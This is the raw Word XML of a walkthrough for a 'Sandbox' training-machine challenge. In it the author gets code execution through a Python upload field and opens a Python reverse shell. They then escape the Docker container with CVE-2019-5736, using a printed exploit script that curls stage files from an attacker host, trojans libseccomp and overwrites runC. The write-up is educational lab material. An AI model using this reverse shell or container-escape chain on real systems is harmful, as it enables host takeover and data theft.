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SANDBOX</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ssohj4f0k2w6"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t5kqaexme7tk"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235200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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235200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>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D">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21100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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the website, we see an upload field. So, we will upload a Python file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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print(1+2)</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54400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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our Python code was processed and is running inside a Docker container. We can try importing the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">os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 to execute system commands. Since this is a sandbox, we may need to bypass restrictions — or maybe not.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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os</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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os.system("whoami")</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24300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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command was successfully executed. Therefore, we can create a Python reverse shell:</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pty</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socket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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subprocess</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os</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</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s.connect(("&lt;IP-VPN&gt;",443))</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 0)</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 1)</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 2)</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pty.spawn("/bin/bash")</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387600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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our payload, we receive the shell =)</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6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first flag, which is located inside the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sss_source.py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82900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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wjc6brpkfrxc" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>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2A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.6cvpp1x4i36b" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2019-5736</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html</w:t>
        </w:r>
      </w:hyperlink>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us0zfp4okq5" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Vulnerability</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analyze the vulnerability overview provided by the runC team:</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vulnerability allows a malicious container (with minimal user interaction) to overwrite the host’s runc binary and thus obtain root-level code execution on the host. The required level of user interaction is simply the ability to execute any command as root inside a container in any of the following contexts:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Creating a new container using an attacker-controlled image;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Attaching (docker exec) to an existing container to which the attacker previously gained write access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">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186d57t3s1or" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shared Library Approach</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the runC process is executed in the container, the required libraries are loaded into the runC process by the dynamic linker. It is possible to replace one of these libraries with a malicious version, which will overwrite the runC binary when loaded into the runC process.</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exploit works as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">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runC process loads the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">libseccomp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 and transfers execution to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run_at_link</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run_at_link</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> opens the runC binary for reading through </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/self/exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This creates a file descriptor at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/self/fd/${runc_fd_read}</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run_at_link</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> calls </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">execve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execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">overwrite_runc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36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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process is no longer executing the runC binary;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">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overwrite_runc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opens </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/self/fd/runc_fd_read</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for writing and overwrites the runC binary.</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Reference links explaining the exploit:</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hyperlink r:id="rId17">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.youtube.com/watch?v=zsYe3AGgEng</w:t>
          <w:br w:type="textWrapping"/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/</w:t>
          <w:br w:type="textWrapping"/>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use a ready-made exploit from the link above.</w:t>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hyperlink r:id="rId19">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/diofeher/ctf-writeups/tree/master/2018-03-15-ctf-br-sss</w:t>
        </w:r>
      </w:hyperlink>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files to our machine, we begin modifying them.</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first step is to edit the server URL (IP) and our VPN IP address, which will be used for downloading the files into the Docker container.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">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y4zxy02azhfz" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sss.py:</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os</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requests</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:jc w:val="both"/>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upload(xpl):</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fp = {</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'file': ('diofeher.py', open('code.py', 'rb')),</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URL = 'http://172.16.15.125/upload' #CHANGE-THIS</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print('request url:', URL)</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body = requests.post(URL, files=fp, data=dict(filename=xpl))</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print('response status code:', body.status_code)</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print('response body:')</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print(body.text)</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 main():</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 = """. .</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apt-get -y install curl</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--silent --output /dev/null {url}/comecando</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set -e -x ;\</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sed -i 's,# deb-src,deb-src,' /etc/apt/sources.list ;\</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apt -y update ;\</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apt-get -y install build-essential ;\</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cd /root ;\</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apt-get -y build-dep libseccomp ;\</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apt-get source libseccomp</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--silent --output /dev/null {url}/baixou+seccomp+v0.0.14</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{url}/stage2.c -o /root/stage2.c</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{url}/new_runc -o /root/new_runc</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set -e -x ;\</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cd /root ;\</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gcc stage2.c -o /stage2</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{url}/stage1.c -o /root/stage1.c</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--silent --output /dev/null {url}/gonna_build_libseccomp1</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set -e -x ;\</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cd /root/libseccomp* ;\</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cat /root/stage1.c &gt;&gt; src/api.c ;\</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DEB_BUILD_OPTIONS=nocheck dpkg-buildpackage -b -uc -us ;\</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dpkg -i /root/*.deb</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--silent --output /dev/null {url}/built_libseccomp</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ENTRYPOINT [ "/entrypoint" ]</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set -e -x ;\</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ln -s /proc/self/exe /entrypoint</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{url}/test.py -o code.py</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curl --silent --output /dev/null {url}/finished+script</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#""".format(url='http://10.0.70.67') #CHANGE-THIS</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 = cmd.replace('/', '\x2f')</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print('length:', len(cmd))</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upload(cmd)</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main()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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edit the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">new_runc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and insert our reverse shell payload.</w:t>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5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start a Python server to host our files:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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311400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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78">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451100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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execute the script </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sss.py .</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sss.py</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a shell =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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6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our final flag, which is stored in an environment variable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">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324100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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successfully complete the challenge.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">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2">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="11"/>
    <w:bookmarkEnd w:id="11"/>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4"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3">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4">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5"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Sandbox</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1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hyperlink" Target="https://app.hackingclub.com/training/training-machines/25" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><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hyperlink" Target="https://www.youtube.com/watch?v=zsYe3AGgEng" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/diofeher/ctf-writeups/tree/master/2018-03-15-ctf-br-sss" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-57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2UVrdjR/rRc5AJJ40gFoiEY7A==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLnNzb2hqNGYwazJ3NjIOaC50NWtxYWV4bWU3dGsyDmgud2pjNmJycGtmcnhjMg5oLjZjdnBwMXg0aTM2YjIOaC5idXMwemZwNG9rcTUyDmguMTg2ZDU3dDNzMW9yMg5oLnk0enh5MDJhemhmejIOaC4xNzVmNWNzOTR6MG84AHIhMWJIYUdhbXZVajVCTzVaR3U4RVg2S3czbEVHNkRGZFJ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